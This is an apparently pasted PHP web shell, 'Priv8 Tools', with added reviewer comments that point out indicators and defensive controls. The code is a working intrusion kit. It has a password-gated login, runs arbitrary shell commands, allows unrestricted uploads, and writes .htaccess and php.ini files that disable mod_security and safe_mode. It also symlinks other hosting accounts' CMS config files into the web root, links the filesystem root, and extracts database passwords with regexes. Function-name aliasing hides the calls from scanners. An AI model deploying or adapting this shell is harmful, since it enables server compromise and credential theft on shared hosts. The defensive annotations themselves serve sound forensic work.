
Untitled

a guest
Feb 7th, 2019
  1. <?
     // NOTE(review): login gate of a PHP web shell. Nothing below this block is
     // rendered until $_SESSION['sec'] is true. The file opens with the short tag
     // `<?`, which PHP only parses when short_open_tag is enabled.
  2.  
     // Hard-coded credentials. $password is an unsalted md5() hex digest and the
     // author's trailing comment gives the plaintext, so anyone who has seen this
     // paste can pass the gate: treat a deployed copy as usable by third parties,
     // not only by whoever planted it. The literal digest is a stable string to
     // search web roots for.
  3. $username = "admin"; # Here Your Username
  4. $password = "cd6e5f8cae72a13cb149fa907abeeb19"; # password = zaid
     // Taken straight from the request with no isset() check.
  5. $user = $_POST['user'];
  6. $pass = $_POST['pass'];
     // Login form markup, reused for the first visit and for the failure page.
     // The background image is hot-linked from a third-party host.
  7. $form = "<form method='POST'>
  8. <img src='https://khaberni-6zrocpuaymq7.stackpathdns.com/uploads/news_model/2018/08/main_image5b6ebdc662f06.JPG' style='position:fixed;width:100%;heigth:100%;top:0;left:0;z-index:-9999;' disabled>
  9. <center>
  10. <h1>3Bad Hacker</h1> <br>
  11. <br><input type='text' name='user'>
  12. <br>
  13. <input type='password' name='pass'>
  14. <br>
  15. <br><input type='submit' value='Login !'>
  16. </form></br>";
  17.  
  18. session_start();
      // The session flag defaults to false on first contact.
  19. if(!isset($_SESSION['sec']))
  20. {
  21. $_SESSION['sec'] = false;
  22. }
      // True only when a 'pass' field was posted with this request.
  23. if(isset($pass))
  24. {
      // Loose (==) comparison of the posted name and md5(pass) with the constants above.
  25. if($user == $username and md5($pass) == $password)
  26. {
  27. $_SESSION['sec'] = true;
  28. }
  29. else
  30. {
  31. die("{$form} <br> Error :D");
  32. }
  33. }
      // Not authenticated: show the form and stop before any tool code runs.
  34. if(!$_SESSION['sec']):
  35. echo $form;
  36. exit();
  37. endif;
  38.  
  39. # Logout
      // Destroys the session but does not exit, so this request still renders the page below.
  40. if($_GET['log'] == 'out')
  41. {
  42. session_destroy();
  43. }
      // $user comes from $_POST and is echoed without HTML escaping.
  44. echo "Welcome {$user} | <a href='?log=out'>Logout</a>";
  45.  
  46. ?>
  47. <head>
  48.  
  49. <title>Priv8 Tools By Moshkela Hacker</title>
  50. <link rel="icon" href="http://icons.iconarchive.com/icons/custom-icon-design/round-world-flags/256/Jordan-icon.png">
  51. </head>
  52. <?
      // Removes the execution time limit and turns PHP error reporting off for
      // the request, so failures in the tools below are not reported.
  53. set_time_limit(0);
  54. error_reporting(0);
  55. ?>
  56. <?php ?><html>
  57.  
  58.  
  59. <style type="text/css">
  60. html,body{
  61. background: #f9f9f9;
  62. padding: 0;
  63. direction: ltr;
  64. margin: 0;
  65. }
  66. h1{
  67. color:#ff0000;
  68. text-shadow:0 0 5px;
  69. }
  70. h3{
  71. color:#ff0000;
  72. text-shadow:0 0 1px;
  73. }
  74. .f{
  75. color:#666;
  76. text-shadow: 0 0 5px #00ff00;
  77. font-size: 20px;
  78. }
  79. a{
  80. text-decoration: none;
  81. color:#ff0000;
  82. text-shadow:0 0 5px;
  83. }
  84. input[type=submit]{
  85. padding: 9px;
  86. border:1px solid #ccc;
  87. background: #f9f9f9;
  88. border-radius: 2px;
  89. cursor: pointer;
  90. color:#000;
  91. transition: all 0.2s;
  92. }
  93. input[type=submit]:hover{
  94. box-shadow: 0 0 2px #ff0000;
  95. }
  96. input[type=text]{
  97. color:#000;
  98. border:1px solid #ccc;
  99. background: #f9f9f9;
  100. padding: 10px;
  101. width: 400px;
  102. transition: all 0.5s;
  103. }
  104. input[type=text]:focus{
  105. box-shadow: 0 0 3px #ff0000;
  106. }
  107. hr{
  108. border: 0;
  109. height: 2px;
  110. background: #333;
  111. background-image: linear-gradient(to right, #FF00FF, #333, #FF00FF);
  112. }}
  113. </style>
  114. <center>
  115. <hr>
  116. <form method='GET'>
  117.  
  118. <input type='submit'name='tool' value='Safe Mode' size='10' >
  119. <input type='submit'name='tool' value='Execute' size='10' >
  120. <input type='submit'name='tool' value='Config Killer' size='10' >
  121. <input type='submit'name='tool' value='Symlink' size='10' >
  122. <input type='submit'name='tool' value='Symlink 2' size='10' >
  123. <input type='submit'name='tool' value='Jumping' size='10' >
  124. <input type='submit'name='tool' value='Pass Config' size='10' >
  125. <input type='submit'name='tool' value='Upload' size='10' >
  126. <input type='submit'name='tool' value='Other tools' size='10' >
  127. <input type='submit'name='tool' value='Server Info' size='10' >
  128. <input type='submit'name='tool' value='About' size='10' >
  129.  
  130.  
  131.  
  132. </h5>
  133.  
  134. </form>
  135. <hr>
  136. <?php
       // NOTE(review): indirection table. Each $xNN holds the *name* of a PHP
       // built-in as a string; the tools below call them as variable functions
       // (for example $x96(...) is system(...), $x95(...) is symlink(...)).
       // Because call sites never spell out system(/shell_exec(/symlink(, scanners
       // that grep for those call forms miss this file. Matching the quoted
       // function names, or `$var(` calls fed from $_POST/$_REQUEST, is more
       // reliable.
       // ereg/eregi and the mysql_* functions were removed in PHP 7.0, which dates
       // this code to PHP 5-era hosting.
  137. $x73 = "basename";
  138. $x74 = "chdir";
  139. $x75 = "copy";
  140. $x76 = "error_reporting";
  141. $x77 = "eregi";
  142. $x78 = "ereg";
  143. $x79 = "explode";
  144. $x7a = "fclose";
  145. $x7b = "file_get_contents";
  146. $x7c = "file_put_contents";
  147. $x7d = "file";
  148. $x7e = "flush";
  149. $x7f = "fileowner";
  150. $x80 = "fopen";
  151. $x81 = "fwrite";
  152. $x82 = "function_exists";
  153. $x83 = "getcwd";
  154. $x84 = "ini_restore";
  155. $x85 = "ini_get";
  156. $x86 = "is_file";
  157. $x87 = "mail";
  158. $x88 = "mkdir";
  159. $x89 = "mysql_connect";
  160. $x8a = "mysql_fetch_array";
  161. $x8b = "mysql_query";
  162. $x8c = "mysql_select_db";
  163. $x8d = "phpversion";
  164. $x8e = "posix_getpwuid";
  165. $x8f = "preg_match_all";
  166. $x90 = "preg_match";
  167. $x91 = "rand";
  168. $x92 = "set_time_limit";
  169. $x93 = "shell_exec";
  170. $x94 = "strlen";
  171. $x95 = "symlink";
  172. $x96 = "system";
  173. $x97 = "trim";
       // set_time_limit(0) and error_reporting(0) again, this time through the aliases.
  174. $x92(0);
  175. $x76(0);
  176.  
  177. ///Safe Mode
       // "Safe Mode" tool: renders a selector and, when the form is posted, calls
       // one of the three writers defined below (x0b, x0c, x0d). Each writer drops
       // a configuration file into the script's working directory.
  178. if ($_REQUEST['tool'] == "Safe Mode") {
  179. echo '<h3> Safe Mode Fucker </h3>
  180. <br><form method="POST" action="">
  181. <select name="way">
  182. <option>php.ini</option>
  183. <option>ini.php</option>
  184. <option>htaccess</option>
  185. </select><input name="bypass" type="submit"class="dh" value="Bypass Using"><br>';
       // Dispatch on the posted option text.
  186. if ($_POST['way'] == "htaccess") {
  187. x0b();
  188. } elseif ($_POST['way'] == "php.ini") {
  189. x0c();
  190. } elseif ($_POST['way'] == "ini.php") {
  191. x0d();
  192. }
  193. }
  194. function x0b() {
       // Writes a .htaccess into the working directory (getcwd() plus $x30, which
       // is neither imported nor assigned in this scope). The file enables
       // FollowSymLinks and indexes, switches off the SecFilter* directives inside
       // an <IfModule mod_security.c> block, and points PHPRC / suPHP_ConfigPath
       // at a php.ini in the same directory.
       // Defender view: a .htaccess in a web directory that contains
       // "SecFilterEngine Off", "SetEnv PHPRC" or "suPHP_ConfigPath" is a strong
       // indicator. Restricting AllowOverride stops such a file taking effect.
  195. global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
       // fopen(..., "w") through the alias: truncates any existing .htaccess.
  196. $x2f = $x80($x83() . $x30 . "/.htaccess", "w");
  197. $x81($x2f, "Options +FollowSymLinks
  198. DirectoryIndex india.htm
  199.  
  200. Options All Indexes
  201. <IfModule mod_security.c>
  202. SecFilterEngine Off
  203. SecFilterScanPOST Off
  204.  
  205. SecFilterCheckURLEncoding Off
  206. SecFilterCheckCookieFormat Off
  207. SecFilterCheckUnicodeEncoding Off
  208. SecFilterNormalizeCookies Off
  209. </IfModule>
  210. SetEnv PHPRC " . $x83() . $x30 . "/php.ini
  211. suPHP_ConfigPath " . $x83() . $x30 . "/php.ini");
  212. $x7a($x2f);
       // Success is judged only by the file existing afterwards (is_file alias).
  213. if ($x86($x83() . $x30 . "/.htaccess")) {
  214. echo "<Span style='color:#FF00FF;'><strong>.htaccess Created successfully</strong></span><br>";
  215. } else {
  216. echo "<strong><Span style='color:#FF00FF;'>I can not create .htaccess</strong></span><br>";
  217. };
  218. }
  219. function x0c() {
       // Writes a php.ini into the working directory that sets safe_mode and
       // safe_mode_gid off, disable_functions to NONE and open_basedir to OFF.
       // NOTE(review): whether PHP reads a per-directory php.ini depends on the
       // SAPI and handler configuration of the host; confirm for the server under
       // investigation. An unexpected php.ini inside a document root with these
       // four settings is an indicator in either case.
  220. global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
  221. $x31 = $x80($x83() . $x30 . "/php.ini", "w");
  222. $x81($x31, "safe_mode = Off
  223. disable_functions = NONE
  224. safe_mode_gid = OFF
  225.  
  226. open_basedir = OFF");
  227. $x7a($x31);
       // Success is judged only by the file existing afterwards.
  228. if ($x86($x83() . $x30 . "/php.ini")) {
  229. echo "<strong><Span style='color:#FF00FF;'>php.ini Created successfully</strong></span><br>";
  230. } else {
  231. echo "<strong><Span style='color:#FF00FF;'>I can not create php.ini</strong></span><br>";
  232. };
  233. }
  234. function x0d() {
       // Writes a file named ini.php into the working directory. The payload is a
       // single-quoted literal, so the text `$x84("safe_mode");` is written
       // verbatim rather than being expanded here.
       // Artefact for triage: an ini.php containing those two lines.
  235. global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
  236. $x32 = $x80($x83() . $x30 . "/ini.php", "w");
  237. $x81($x32, '$x84("safe_mode");
  238. $x84("open_basedir");');
  239. $x7a($x32);
  240. if ($x86($x83() . $x30 . "/ini.php")) {
  241. echo "<strong><Span style='color:#FF00FF;'>ini.php Created successfully</strong></span><br>";
  242. } else {
  243. echo "<strong><Span style='color:red;'>I can not create ini.php</strong></span><br>";
  244. };
  245. }
  246. //////Execute
       // "Execute" tool: the arbitrary command execution primitive of the shell.
       // The posted `cmd` value is handed unmodified to an OS command function and
       // the output is printed inside a read-only textarea.
       // Defender view: look for POST requests carrying `cmd` and `go` fields to a
       // URL with tool=Execute in the query string, and for the web server or PHP
       // worker process spawning a shell. Listing the command functions in
       // disable_functions removes this path.
  247. if ($_REQUEST['tool'] == "Execute") {
  248. echo '<h3> Execute </h3>
  249. <form method="post">
  250. <input name="cmd" />
  251. <input type="submit"class="dh" name="go" />
  252. </form>';
  253. if ($_POST['go']) {
       // function_exists() probes (alias $x82) decide which branch below runs.
  254. $x4b = $x82("system");
  255. $x4c = $x82("passthru");
  256. $x4d = $x82("shell_exec");
       // Preferred path: system() through alias $x96.
  257. if ($x4b) {
  258. echo "<textarea readonly='' cols='90'rows='20'>";
  259. echo $x96($_POST['cmd']);
  260. echo '</textarea>';
  261. }
       // Fallback branches; the conditions combine the booleans with bitwise &.
  262. if (!$x4b & $x4c) {
  263. echo "<textarea readonly='' cols='90'rows='20'>";
  264. echo passthrsu($_POST['cmd']);
  265. echo '</textarea>';
  266. }
  267. if (!$x4b & !$x4c & $x4d) {
  268. echo "<textarea readonly='' cols='90'rows='20'>";
  269. echo $x93($_POST['cmd']);
  270. echo '</textarea>';
  271. }
  272. }
  273. }
  274. /////upload
       // "Upload" tool: moves an uploaded file into the working directory under
       // the client-supplied file name. There is no extension, type or size check;
       // $maxfile is assigned but not used in the code shown.
       // Defender view: new files appearing beside the shell shortly after a
       // multipart POST to it belong to the same intrusion. Keeping the web
       // account from writing into executable directories blocks this step.
  275. else if ($_REQUEST['tool'] == "Upload") {
  276. echo"<h3>Upload</h3>";
  277. if(isset($_POST['Submit'])){
  278. $filedir = "";
  279. $maxfile = '2000000';
  280.  
  281. $userfile_name = $_FILES['image']['name'];
  282. $userfile_tmp = $_FILES['image']['tmp_name'];
  283. if (isset($_FILES['image']['name'])) {
       // $filedir is empty, so the destination is relative to the current directory.
  284. $abod = $filedir.$userfile_name;
       // @ hides any failure; the "Don3" line below is printed regardless of the result.
  285. @move_uploaded_file($userfile_tmp, $abod);
  286.  
  287. echo"<center><b><h3> Don3 ==> $userfile_name</h3></b></center>";
  288. }
  289. }
  290. else{
  291. echo'
  292. <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit"class="dh" name="Submit" value="up"></form>';
  293. }
  294. }
  295. ////Config Killer
       // "Config Killer" tool. First view: prints /etc/passwd into an editable
       // textarea (file_get_contents alias $x7b). On submit: for every account
       // name in the posted text it tries to symlink that account's likely CMS
       // configuration files into a web-served directory where they are delivered
       // as plain text.
       // Defender view: this only yields data where other tenants' config files
       // are readable by this account and the web server follows symlinks it does
       // not own. Owner-only permissions on config files, SymLinksIfOwnerMatch,
       // and not letting .htaccess override Options are the usual controls.
       // Artefacts: a directory named M-Iraq holding an appended .htaccess and
       // symlinks such as <user>-wp13.txt, <user>-joomla.txt, <user>-whmcs.txt.
       // Credentials in any config linked this way should be treated as exposed.
  296. else if ($_REQUEST['tool'] == "Config Killer") {
  297.  
  298. echo "<br><center><h3>Config Killer</h3>"; ?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#007700" size="2pt"></p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo $x7b('/etc/passwd'); ?></textarea><br><br><input name="config" size="100" value="GET Config" type="submit"class="dh"><br></form></center><br><?php
  299. }
  300. if ($_POST['config']) {
       // Stops if "symlink" is listed in disable_functions (checked with the eregi alias).
  301. $x33 = $x34 = @$x85("disable_functions");
  302. if ($x77("symlink", $x34)) {
  303. die('<error>Symlink is disabled :( </error>');
  304. }
       // Work directory, mode 0755, then chdir into it; errors are silenced with @.
  305. @$x88('M-Iraq', 0755);
  306. @$x74('M-Iraq');
       // .htaccess body: turns on indexes and symlink following and maps .php and
       // .html to plain-text types so linked source is displayed, not executed.
  307. $x2f = "
  308.  
  309. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  310.  
  311. Options Indexes FollowSymLinks
  312. ForceType text/plain
  313. AddType text/plain .php
  314.  
  315. AddType text/plain .html
  316.  
  317. AddType text/html .shtml
  318. AddType txt .php
  319. AddHandler server-parsed .php
  320.  
  321. AddHandler txt .php
  322.  
  323. AddHandler txt .html
  324.  
  325. AddHandler txt .shtml
  326.  
  327. Options All
  328. Options All";
       // Appended (FILE_APPEND) to .htaccess in the current directory.
  329. $x7c(".htaccess", $x2f, FILE_APPEND);
       // The account list is taken from the request body, not re-read from disk.
  330. $x35 = $_POST["passwd"];
  331. $x35 = $x79("
  332. ", $x35);
  333.  
  334. foreach ($x35 as $x36) {
       // The first colon-separated field of each line is used as the account name.
  335. $x37 = $x79(":", $x36);
  336. $x38 = $x37[0];
       // One symlink attempt per well-known WordPress / Joomla / vBulletin / WHMCS
       // config location under /home/<account>/public_html; failures are silenced.
  337. @$x95('/home/' . $x38 . '/public_html/wp-config.php', $x38 . '-wp13.txt');
  338. @$x95('/home/' . $x38 . '/public_html/wp/wp-config.php', $x38 . '-wp13-wp.txt');
  339. @$x95('/home/' . $x38 . '/public_html/WP/wp-config.php', $x38 . '-wp13-WP.txt');
  340. @$x95('/home/' . $x38 . '/public_html/wp/beta/wp-config.php', $x38 . '-wp13-wp-beta.txt');
  341. @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp13-beta.txt');
  342. @$x95('/home/' . $x38 . '/public_html/press/wp-config.php', $x38 . '-wp13-press.txt');
  343. @$x95('/home/' . $x38 . '/public_html/wordpress/wp-config.php', $x38 . '-wp13-wordpress.txt');
  344. @$x95('/home/' . $x38 . '/public_html/Wordpress/wp-config.php', $x38 . '-wp13-Wordpress.txt');
  345. @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp13-Wordpress.txt');
  346. @$x95('/home/' . $x38 . '/public_html/config.php', $x38 . '-configgg.txt');
  347. @$x95('/home/' . $x38 . '/public_html/news/wp-config.php', $x38 . '-wp13-news.txt');
  348. @$x95('/home/' . $x38 . '/public_html/new/wp-config.php', $x38 . '-wp13-new.txt');
  349. @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp-blog.txt');
  350. @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp-beta.txt');
  351. @$x95('/home/' . $x38 . '/public_html/blogs/wp-config.php', $x38 . '-wp-blogs.txt');
  352. @$x95('/home/' . $x38 . '/public_html/home/wp-config.php', $x38 . '-wp-home.txt');
  353. @$x95('/home/' . $x38 . '/public_html/db.php', $x38 . '-dbconf.txt');
  354. @$x95('/home/' . $x38 . '/public_html/site/wp-config.php', $x38 . '-wp-site.txt');
  355. @$x95('/home/' . $x38 . '/public_html/main/wp-config.php', $x38 . '-wp-main.txt');
  356. @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-wp-test.txt');
  357. @$x95('/home/' . $x38 . '/public_html/joomla/configuration.php', $x38 . '-joomla2.txt');
  358. @$x95('/home/' . $x38 . '/public_html/portal/configuration.php', $x38 . '-joomla-protal.txt');
  359. @$x95('/home/' . $x38 . '/public_html/joo/configuration.php', $x38 . '-joo.txt');
  360. @$x95('/home/' . $x38 . '/public_html/cms/configuration.php', $x38 . '-joomla-cms.txt');
  361. @$x95('/home/' . $x38 . '/public_html/site/configuration.php', $x38 . '-joomla-site.txt');
  362. @$x95('/home/' . $x38 . '/public_html/main/configuration.php', $x38 . '-joomla-main.txt');
  363. @$x95('/home/' . $x38 . '/public_html/news/configuration.php', $x38 . '-joomla-news.txt');
  364. @$x95('/home/' . $x38 . '/public_html/new/configuration.php', $x38 . '-joomla-new.txt');
  365. @$x95('/home/' . $x38 . '/public_html/home/configuration.php', $x38 . '-joomla-home.txt');
  366. @$x95('/home/' . $x38 . '/public_html/vb/includes/config.php', $x38 . '-vb-config.txt');
  367. @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm15.txt');
  368. @$x95('/home/' . $x38 . '/public_html/central/configuration.php', $x38 . '-whm-central.txt');
  369. @$x95('/home/' . $x38 . '/public_html/whm/whmcs/configuration.php', $x38 . '-whm-whmcs.txt');
  370. @$x95('/home/' . $x38 . '/public_html/whm/WHMCS/configuration.php', $x38 . '-whm-WHMCS.txt');
  371. @$x95('/home/' . $x38 . '/public_html/whmc/WHM/configuration.php', $x38 . '-whmc-WHM.txt');
  372. @$x95('/home/' . $x38 . '/public_html/whmcs/configuration.php', $x38 . '-whmcs.txt');
  373. @$x95('/home/' . $x38 . '/public_html/support/configuration.php', $x38 . '-support.txt');
  374. @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-joomla.txt');
  375. @$x95('/home/' . $x38 . '/public_html/submitticket.php', $x38 . '-whmcs2.txt');
  376. @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm.txt');
  377. }
  378. echo '<b class="cone"><font face="Tahoma" color="#FF00FF" size="2pt"><b>[M-IRAQ] -></b> <a target="_blank" href="M-Iraq">Open configs</a></font></b>';
  379. }
  380. }
  381. ////Symlink
       // "Symlink" tool: links the filesystem root into a web-served directory and
       // prints a domain / account / link table built from /etc/named.conf.
       // Artefacts: a directory m-iraq (mode 0777) holding a .htaccess and a
       // symlink named root that points at "/". A symlink to "/" inside a document
       // root is a high-confidence indicator worth scanning for.
       // Controls: SymLinksIfOwnerMatch, Options not overridable from .htaccess,
       // and /etc/named.conf and /etc/valiases not readable by hosting accounts.
  382. else if ($_REQUEST['tool'] == "Symlink") {
  383. echo "<h3>Symlink Bypass </h3>";
  384. echo '<form action="" method="post">';
  385. @$x92(0);
  386. echo "<center>";
  387. @$x88('m-iraq', 0777);
       // .htaccess body: indexes plus symlink following, with .php and .html mapped to text.
  388. $x2f = "Options Indexes FollowSymLinks
  389. DirectoryIndex ssssss.htm
  390. AddType txt .php
  391. AddHandler txt .php
  392. AddType txt .html
  393. AddHandler txt .html
  394. Options all
  395. Options
  396. Options
  397. ReadmeName r.txt";
  398. $x26 = @$x80('m-iraq/.htaccess', 'w');
  399. $x81($x26, $x2f);
       // symlink('/', 'm-iraq/root') through the alias.
  400. @$x95('/', 'm-iraq/root');
  401. $x27 = $x73('index.php');
       // file() alias: reads /etc/named.conf into an array of lines.
  402. $x28 = @$x7d('/etc/named.conf');
  403. if (!$x28) {
  404. echo "<pre ='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  405. } else {
  406. echo "<br><br><div><table border='1' bordercolor='#FF00FF' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  407. foreach ($x28 as $x29) {
       // Only lines containing "zone" are considered; the quoted zone name is captured.
  408. if ($x77('zone', $x29)) {
  409. $x8f('#zone "(.*)"#', $x29, $x2a);
  410. $x7e();
  411. if ($x94($x97($x2a[1][0])) > 2) {
       // Maps the domain to an account: owner uid of /etc/valiases/<domain>,
       // resolved with posix_getpwuid.
  412. $x2b = $x8e(@$x7f('/etc/valiases/' . $x2a[1][0]));
  413. $x2c = $x2b['name'];
  414. @$x95('/', 'm-iraq/root');
  415. $x2c = $x2a[1][0];
       // Suffix patterns used only to highlight matching domains in the table;
       // no other logic in this branch depends on the match.
  416. $x2d = '\.sa';
  417. $x2e = '\.il';
  418. $x1e = '\.id';
  419. $x1f = '\.sg';
  420. $x20 = '\.edu';
  421. $x21 = '\.gov';
  422. $x22 = '\.go';
  423. $x23 = '\.gob';
  424. $x24 = '\.mil';
  425. $x25 = '\.mi';
  426. if ($x77("$x2d", $x2a[1][0]) or $x77("$x2e", $x2a[1][0]) or $x77("$x1e", $x2a[1][0]) or $x77("$x1f", $x2a[1][0]) or $x77("$x20", $x2a[1][0]) or $x77("$x21", $x2a[1][0]) or $x77("$x22", $x2a[1][0]) or $x77("$x23", $x2a[1][0]) or $x77("$x24", $x2a[1][0]) or $x77("$x25", $x2a[1][0])) {
  427. $x2c = "<div style=' color: #FF00FF ; text-shadow: 0px 0px 1px red; '>" . $x2a[1][0] . '</div>';
  428. }
       // One table row per zone: domain, account name, and a link through the root symlink.
  429. echo "
  430. <tr>
  431. <td>
  432. <div class='dom'><a target='_blank' href=http://www." . $x2a[1][0] . '/>' . $x2c . ' </a> </div>
  433. </td>
  434. <td>
  435. ' . $x2b['name'] . "
  436. </td>
  437.  
  438. <td>
  439. <a href='m-iraq/root/home/" . $x2b['name'] . "/public_html' target='_blank'>Symlink </a>
  440. </td>
  441. </tr></div> ";
  442. }
  443. }
  444. }
  445. }
  446. echo "</table>";
  447. }
  448. //// Symlink2
       // "Symlink 2" tool: exposes one caller-chosen file. The posted path is
       // symlinked into a newly created directory named with rand(), whose
       // .htaccess turns on directory indexes and names the link as ReadMeName;
       // the directory is then shown in an iframe.
       // Defender view: same preconditions and controls as the other symlink
       // tools. Look for numerically named directories that contain only a
       // .htaccess and a <number>.txt symlink.
  449. else if ($_REQUEST['tool'] == "Symlink 2") {
  450. echo '
  451. <h3>Symlink-2</h3>
  452. <FORM ACTION="#" METHOD="POST">
  453. <br>
  454. <br>
  455. <center> <font size="2" face="MV Boli" color=rgba(1, 44, 221, 0.9) ></font> <INPUT TYPE="text" NAME="user"placeholder="/home/user/public_html/config.php" SIZE=60><INPUT TYPE="submit"class="dh" VALUE="Sym"> </center>
  456. </FORM>';
       // Target path comes straight from the request; the link name is <rand()>.txt.
  457. $x4e = $_POST["user"];
  458. $x4f = '' . $x91() . '.txt';
  459. if ($x4e) {
  460. $x50 = $x91();
  461. @$x88($x50);
  462. $x51 = $x50 . "/.htaccess";
  463. $x52 = $x80($x51, 'w') or die("Error: Can't open file");
  464. $x53 = 'Options +Indexes
  465. ReadMeName ' . $x4f;
  466. $x81($x52, $x53);
  467. $x7a($x52);
       // chdir in, create the symlink, chdir back out.
  468. $x74($x50);
  469. $x95($x4e, $x4f);
  470. $x74("../");
  471. echo "<center><iframe height ='500px' width='100%' src=" . $x50 . "></iframe></center>";
  472. }
  473. }
  474. /////Get Password in Config
       // "Pass Config" tool: fetches the location given in `conf`, follows every
       // href="..." found in it, and searches each fetched body for database
       // password assignments used by common PHP applications.
       // NOTE(review): presumably meant to be pointed at the index of linked
       // config files produced by the Config Killer tool; the code itself accepts
       // any path or URL that file_get_contents can open.
       // Defender view: any credential in a config file reachable this way should
       // be treated as exposed and rotated.
  475. else if ($_REQUEST['tool'] == "Pass Config") {
  476. echo"<h3>Get Password in Config</h3>";
  477. echo '<form method="post">
  478. <input type="text" name="conf" value="" />
  479. <input type="submit"class="dh"value="GeT Passwords" name="get" />
  480. </form>';
  481. $x39 = $_POST['get'];
  482. $x3a = $_POST['conf'];
  483. //////////////////////////////////////////////////////////////////////////////////////////////
  484. if (isset($x39) && $x3a != "") {
       // Index page is fetched with errors silenced; links are pulled out by regex.
  485. $x3b = @$x7b($x3a);
  486. //$x8f('#href="(.*?)">(.*?)<#',$x3b,$x3c); // $x3c[2]
  487. $x8f('#href="(.*?)"#', $x3b, $x3c);
  488. foreach ($x3c[1] as $x3d) {
       // Each link is appended to the base location and fetched.
  489. $x3e = $x3a . $x3d;
  490. $x3f = @$x7b($x3e);
  491. $x90('#\'DB_PASSWORD\', \'(.*)\'#', $x3f, $x40); // wordpress
  492. $x90('#password = \'(.*)\'#', $x3f, $x41); // joomla
  493. $x90('#password\'] = \'(.*)\'#', $x3f, $x42); // vb
  494. $x90('#db_password = "(.*)"#', $x3f, $x43); // whmcs
  495. $x90('#db_password = \'(.*)\'#', $x3f, $x43); // whmcs
  496. $x90('#dbpass = "(.*)"#', $x3f, $x44); //
  497. $x90('#password = \'(.*)\'#', $x3f, $x45); // connnect.php
  498. $x90('#dbpasswd = \'(.*)\'#', $x3f, $x46); // phpBB 3.0.x
  499. $x90('#password_localhost = "(.*)"#', $x3f, $x47); // conexao.php
  500. $x90('#senha = "(.*)"#', $x3f, $x48); // /_inc/config.inc.php
       // Prints the first non-empty capture only. $x49 is tested below but is not
       // assigned anywhere in the code shown.
  501. if (!empty($x40[1])) {
  502. echo $x40[1] . "<br>";
  503. } elseif (!empty($x41[1])) {
  504. echo $x41[1] . "<br>";
  505. } elseif (!empty($x42[1])) {
  506. echo $x42[1] . "<br>";
  507. } elseif (!empty($x43[1])) {
  508. echo $x43[1] . "<br>";
  509. } elseif (!empty($x44[1])) {
  510. echo $x44[1] . "<br>";
  511. } elseif (!empty($x45[1])) {
  512. echo $x45[1] . "<br>";
  513. } elseif (!empty($x49[1])) {
  514. echo $x49[1] . "<br>";
  515. } elseif (!empty($x46[1])) {
  516. echo $x46[1] . "<br>";
  517. } elseif (!empty($x47[1])) {
  518. echo $x47[1] . "<br>";
  519. } elseif (!empty($x48[1])) {
  520. echo $x48[1] . "<br>";
  521. }
  522. }
  523. }
  524. }
  525. ////Jumping
       // "Jumping" tool: lists which other accounts' document roots this PHP
       // process is able to read.
       // Defender view: the list is empty when home directories and public_html
       // are not readable by other local accounts, and when /etc/passwd is outside
       // open_basedir for the site.
  526. else if ($_REQUEST['tool'] == "Jumping") {
  527. echo"<h3>Jumping</h3>";
       // Rebinds $x26..$x2e to a second set of function-name aliases for this branch.
  528. $x26 = "array_push";
  529. $x27 = "feof";
  530. $x28 = "fgets";
  531. $x29 = "fopen";
  532. $x2a = "ini_get";
  533. $x2b = "is_readable";
  534. $x2c = "set_time_limit";
  535. $x2d = "strpos";
  536. $x2e = "substr";
       // Aborts when ini_get('safe_mode') does not compare equal to 0.
  537. ($x2f = $x2a('safe_mode') == 0) ? $x2f = 'off' : die('<b>Error: Safe Mode is On</b>');
  538. $x2c(0);
  539. @$x30 = $x29('/etc/passwd', 'r');
  540. if (!$x30) {
  541. die('<b><font face=Verdana size=2 color=#FF00FF> Error : Can Not Read Config Of Server </b>');
  542. }
  543. $x31 = array();
  544. $x32 = array();
  545. $x33 = array();
  546. $x34 = 0;
  547. echo "<b><font face=Verdana size=13 color=#FF00FF> </font></b><br />";
  548. echo "<br />";
  549. while (!$x27($x30)) {
  550. $x35 = $x28($x30);
       // Skips the first 36 lines (presumably system accounts; confirm against the
       // host), then takes the text before the first ':' as the account name.
  551. if ($x34 > 35) {
  552. $x36 = $x2d($x35, ':');
  553. $x37 = $x2e($x35, 0, $x36);
  554. $x38 = '/home/' . $x37 . '/public_html/';
  555. if (($x37 != '')) {
       // Records and prints the path only when is_readable() succeeds.
  556. if ($x2b($x38)) {
  557. $x26($x32, $x37);
  558. $x26($x31, $x38);
  559. echo "<font face=Verdana size=2 color=#FF00FF> $x38</font>";
  560. echo "<br/>";
  561. }
  562. }
  563. }
  564. $x34++;
  565. }
  566. }
  567. /////About
       // Static credits banner with an image loaded from a third-party host; this
       // branch performs no server-side action.
  568. else if ($_REQUEST['tool'] == "About") {
  569. echo '
  570. <img src="http://d.top4top.net/p_37rzbl1.png" width="500" height="400" />
